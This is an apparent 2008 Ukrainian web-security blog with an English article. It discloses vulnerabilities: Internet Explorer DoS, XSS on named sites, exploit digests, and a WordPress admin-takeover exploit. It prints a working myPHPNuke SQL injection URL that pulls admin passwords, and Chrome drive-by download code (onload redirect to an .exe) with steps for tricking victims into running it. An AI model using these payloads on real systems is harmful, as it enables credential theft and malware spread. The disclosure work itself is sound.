Websecurity - Веб безпека

В минулому році, як повідомив securityvulns.ru, була виявлена DoS уразливість в Microsoft Internet Explorer.

Атака відбувається через використання в стилях властивості position:relative, що в IE призводить до відмови браузера. Уразливі Microsoft Internet Explorer 6 та Internet Explorer 7.

Пригототував для вас для експлоіта: оригінальний та мою версію. В результаті роботи експлоітів браузер вилітає (тобто DoS атака).

Протестувати Internet Explorer (варіант 1)

Протестувати Internet Explorer (варіант 2)

Останній тест для IE був DoS в Internet Explorer, з яким ви також можете ознайомитися.

31.03.2008

У вересні, 08.09.2007, а також додатково сьогодні, я знайшов нові Cross-Site Scripting уразливості на проекті http://www.banner.kiev.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на www.banner.kiev.ua.

Детальна інформація про уразливості з’явиться пізніше.

15.09.2008

XSS:

• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)

Дані три уразливості більше не працюють після проведених технічних робіт на сайті.

XSS:

• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• цікавий

Дані уразливості досі не виправлені.

В даній добірці експлоіти в веб додатках:

• Alcatel OmniPCX Office 210/061.1 Remote Command Execution Vuln (деталі)
• Netious CMS 0.4 (index.php pageid) SQL Injection Vulnerability (деталі)
• Netbutikker <= v4 Remote SQL Injection Vulnerabilities (деталі)
• Weblosninger <= v4 (XSS/SQL) Multiple Remote Vulnerabilities (деталі)
• 6rbScript (news.php newsid) Remote SQL Injection Vulnerability (деталі)
• OneCMS 2.5 (install_mod.php) Local File Inclusion Vulnerability (деталі)
• Quate CMS 0.3.4 (RFI/LFI/XSS/DT) Multiple Remote Vulnerabilities (деталі)
• e107 Plugin BLOG Engine 2.2 (uid) Blind SQL Injection Vulnerability (деталі)
• RoomPHPlanning 1.5 (idresa) Remote SQL Injection Vulnerability (деталі)
• phpRaider 1.0.7 (phpbb3.functions.php) RFI Vulnerability (деталі)

У серпні, 24.08.2008, після знайдення попередніх, я знайшов нову SQL Injection уразливість в системі myPHPNuke. Дірку я виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам системи.

SQL Injection:

http://site/download.php?op=viewdownload&cid=-1%20union%20select%20concat(aid,char(45),pwd)%20from%20mpn_authors%20limit%200,1

Уразливі версії до myPHPNuke 1.8.8_8rc2 (тому що в останній версії наявні додаткові фільтри). При цьому остання версія системи також уразлива - в ній можлива обмежена SQL Injection атака.

This is English version of my Automatic File Download vulnerabilities in browsers article.

For already known vulnerabilities in browsers I’m adding new one. I present for you new class of vulnerabilities in browsers - Automatic File Download - it’s new attack vector, which can be used for spreading malicious software.

I had occasion to meet before with vulnerabilities, which leaded to automatic downloading of arbitrary files from Internet, particularly exe-files, and with further their execution. It was concerned with buffer overflow vulnerabilities in browsers, Internet Explorer in particular. But for the first time I saw such vulnerability, which is a part of browser’s functionality. This vulnerability was presented in browser Google Chrome. Taking into account that in all other browsers, which I worked with, I didn’t see such vulnerability, so I state that Chrome is a first browser with holed function of file downloading (when attack is going through downloading function).

Variants of attack.

From all vulnerabilities which I have found in Google Chrome, including during my project Day of bugs in Google Chrome, there were seven Automatic File Download. Altogether I disclosed eight such holes: one of nerex and seven of mine.

• Automatic File Download vulnerability via tag iframe, found by nerex - original exploit and my version of exploit.
• Automatic File Download vulnerability via tag frame - exploit.
• Automatic File Download vulnerability via tag meta - exploit.
• Automatic File Download vulnerability via tag script - exploit.
• Automatic File Download vulnerability via tag body - exploit.
• Automatic File Download vulnerability via tag form - first exploit and second.
• Automatic File Download vulnerability via tag frameset - exploit.
• Automatic File Download vulnerability via tag img - exploit.

All these vulnerabilities are triggering automatically - while downloading page with required code. I found 8 such cases in all - via tags iframe, frame, meta, script, body, form, frameset and img. It’s possible to use other tags for this attack, but they will not be triggering automatically, because will require some actions from user (press element, pointing at element, etc.). So for the attack the most suitable are these 8 variants of Automatic File Download vulnerability.

All versions of Google Chrome are vulnerable to these holes (last on current time 0.2.149.29 and previous versions of the browser).

Making of attack.

For making of attack it’s required to place code at web page and attract on it user of the browser.

Example of the code for vulnerability via tag body:

<body onload="document.location='http://websecurity.com.ua/uploads/hack.exe'">

Algorithm of attack:

1. User comes to web site, which contains this code.

2. Executable file (exe) is automatically downloading to user’s computer - into download folder, which is set in options.

After that, user in any time can go to his download folder and during check of his files, run this program. Which can be malicious one.

3. To speed up the attack, offender can stimulate victim to run this application from the browser.

For this mass download effect needs to be used. It’s needed to run for automatic downloading multiple exe-files - which will be showing at bottom of browser’s window (as a buttons). And if run simultaneously many downloadings, they will take whole place at bottom of browser’s window. Which make possibility for user to press on them.

4. User can move cursor and press on one of these buttons. He can do it by accident press button (especially when there will be many of them), from interest, or when decided that he downloaded some file by himself.

5. After pressing on it, user right away runs just downloaded program. Which can hacked his computer. On this picture my demonstration program is shown, which designed for reminding about need to attend to security.

As last picture indicates, even Google can’t protect you from me .

Conclusion.

Hidden attack (for file downloading) can be made, when user has turned off option “Ask me where to save every file”. Taking into account that this option is turned off by default, and also that even if it turned on, it can be turned off in any time (or by user, or by somebody “kind”, who will have access to user’s browser), so this vulnerability and attacks concerned with it are presenting serious danger.

From browsers which I worked with, such functionality, when it’s possible to set in settings the option “not ask where to save”, is in browser Firefox (from first 0.x versions, one of which I downloaded in 2004). And so, in all versions of Firefox before files downloading always asking, if you want to save this file (as do other browsers). And this option only affect on appearing of new dialog window, where asking where to save the file (i.e. there are two dialogs). But Chrome right away saves file without questions.

For developers of the browsers, particularly Google, it’s better to not allow such vulnerabilities in their applications.

Після виходу в березні попередньої телепередачі зі мною на Інтері, очікується нова телепередача в цьому місяці.

Сьогодні я знявся для новин для телеканалу 1+1. Які будуть показані на ТБ завтра. Сюжет з моєю участю вийде 14 вересня в 19:30 на 1+1 в програмі “ТСН” (в новинах). В сюжеті мова буде йти про атаки на сайти банків.

Так що всі бажаючі можуть завтра подивитися телепрограму з моєю участю .

P.S.

Можете переглянути дане відео в своєму плеєрі:

http://websecurity.com.ua/uploads/articles/tv_video3.flv

В даній добірці уразливості в веб додатках:

• Bilder Uploader 1.3 Remote Command Execution Vulnerability (деталі)
• Mapos Bilder Galerie Version 1.0 Remote Command Execution Vulnerability (деталі)
• Gstebuch Version 1.5 Remote Command Execution Vulnerability (деталі)
• File Uploader Version 1.1 Remote Command Execution Vulnerability (деталі)
• FinDix Remote File Inclusion Vulnerability (деталі)
• phpMyAdmin multiple XSS vuln. (деталі)
• Storesprite XSS vuln. (деталі)
• eSoft InstaGate EX2 Cross-Site Request Forgery Attack (деталі)
• IBM Rational ClearQuest Web SQL Injection Login Bypass (деталі)
• Olate Download 3.4.1 ~ admin.php ~ Admin authentication bypassing (деталі)

Як я вже писав, нещодавно була виявлена SQL Column Truncation уразливість в WordPress. І два дні тому з’явився експлоіт, призначений для захоплення акаунту адміна. Уразлива версія WordPress 2.6.1 та попередні версії.

Уразливість пов’язана з особливостями роботи MySQL. Використовуючи дірку, можна змінити пароль адміна. А з новим експлоітом, який також використовує Brute Force уразливість в WordPress (що наявна в усіх версіях WP), відбувається підбір нового пароля. Як і у випадку першого експлоіта, для атаки необхідно, щоб на сайті була відкрита реєстрація.

• Wordpress 2.6.1 (SQL Column Truncation) Admin Takeover Exploit (деталі)

До відомих раніше уразливостей в браузерах додаю ще одну. Пропоную вашій увазі новий клас уразливостей в браузерах - Automatic File Download - новий вектор атаки, що може бути використаний для розповсюдження шкідливого програмного забезпечення.

Раніше мені доводилося стикатися з уразливостями, що призводили до автоматичного скачування довільних файлів з Інтернету, зокрема exe-файлів, та з подальшим їх запуском. Це було пов’язано з уразливостями переповнення буферу в браузерах, зокрема в Internet Explorer. Але вперше мені довелося побачити подібну уразливість, яка є частиною функціоналу браузеру. Дана уразливість була презентована в брузері Google Chrome. Враховучи, що в усіх інших браузерах, з якими я працював, я не бачив такої уразливості, то я заявляю, що Chrome є першими браузером з дірявою функцією скачування файлів (коли атака йде саме через функцію скачування).

Варіанти атаки.

Серед усіх уразливостей виявлених мною в Google Chrome, в тому числі в рамках мого проекту День багів в Google Chrome (Day of bugs in Google Chrome), було сім Automatic File Download. Всього таких дірок я оприлюднив вісім: одну від nerex та сім своїх.

• Automatic File Download уразливість через тег iframe, знайдену nerex - оригінальний експлоіт та моя версія експлоіта.
• Automatic File Download уразливість через тег frame - експлоіт.
• Automatic File Download уразливість через тег meta - експлоіт.
• Automatic File Download уразливість через тег script - експлоіт.
• Automatic File Download уразливість через тег body - експлоіт.
• Automatic File Download уразливість через тег form - експлоіт перший та другий.
• Automatic File Download уразливість через тег frameset - експлоіт.
• Automatic File Download уразливість через тег img - експлоіт.

Всі ці уразливості спрацьовують автоматично - при завантаженні сторінки з необхідним кодом. Таких варіантів я виявив всього 8 - через теги iframe, frame, meta, script, body, form, frameset та img. Можливе векористання інших тегів для даної атаки, але вони не будуть спрацьовувати автоматично, бо будуть вимагати деяких дій від користувача (натискання елементу, наведення на елемент та інші). Тому для атаки найбільше всього підходять саме ці 8 варіантів Automatic File Download уразливісті.

До цих дірок вразливі всі версії Google Chrome (остання на даний момент 0.2.149.29 та попередні версії браузера).

Проведення атаки.

Для проведення атаки необхідно розмістити на веб сторінці код і заманити на неї користувача браузеру.

Приклад коду для уразливості через тег body:

<body onload="document.location='http://websecurity.com.ua/uploads/hack.exe'">

Алгоритм атаки:

1. Користувач заходить на веб сайт, що містить даний код.

2. Виконуємий файл (exe) автоматично скачується на комп’ютер користувача - в папку для скачувань, що задана в налашуваннях.

Після чого, користувач в будь-який момент може зайти в свою папку для скачувань і перевіряючи свої файли, запустити дану програму. Що може виявитися шкідливою.

3. Для того, щоб пришвидшити атаку, нападник може стимулювати жертву запустити цей додаток з браузеру. Для цього потрібно використати ефект масових скачувань (mass download effect). Потрібно запустити на автоматичне скачування декілька exe-файлів - що будуть відображуватися внизу вікна браузера (у вигляді кнопок). І якщо запустити одночасно багато скачувань, вони займуть усе місце внизу вікна браузеру. Створючи можливість для користувача натиснути на них.

4. Користувач може підвести курсор і натиснути на одну з цих кнопок. Він може це зробити випадково натиснувши кнопку (особливо коли їх там буде багато), з цікавості, або вирішивши, що це він сам скачав якийсь файл.

5. Натиснувши на неї, користувач одразу запустить щойно викачану програму. Яка може похакати його комп’ютер. На даному малюнку зображена моя демонстраційна програма, яка призначена для нагадування про те, що потрібно слідкувати за безпекою.

Як видно з останнього малюнку, навіть Google не може захистити вас від мене .

Заключення.

Прихована атака (для викачання файла) може відбутися, коли у користувача відключена опція “Запитувати, де зберігати кожен файл перед завантаженням”. Враховучи, що ця опція відключена по замовчуванню, а також те, що навіть якщо вона включена, її в будь-яку мить можуть виключити (або сам користувач, або хтось “добрий”, хто дістанеться браузера користувача), то ця уразливість і пов’язані з нею атаки становлять серйозну небезпеку.

Серед браузерів з якими я працював, подібний функціонал, коли можна задати в налаштуваннях можливість “не запитувати куди зберігати”, є в браузері Firefox (ще з перших 0.x версій, одну з яких я викачав в 2004 році). Так от, в усіх версіях Firefox перед викачанням файлів завжди запитує, чи хочите ви зберігти даний файл (як це роблять й інші браузери). І ця опція впливає лише на появу нового діалогового вікна, де запитується куди зберігти файл (тобто є два діалоги). А Chrome без запитань одразу зберігає файл.

Виробникам брузерів, зокрема Гуглу, варто не допускати таких уразливостей в своїх додатках.

28.03.2008

У вересні, 13.09.2007, я знайшов Cross-Site Scripting уразливість на http://webmoney.ru - сайті відомої електронної платіжної системи (зокрема в локальному пошуці http://search.webmoney.ru). Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно сайтів електронних платіжних систем останній раз я писав про уразливість на cyberplat.ru.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

12.09.2008

XSS:

• alert(document.cookie) (Mozilla)
• alert(document.cookie) (IE)

Дана уразливість вже виправлена.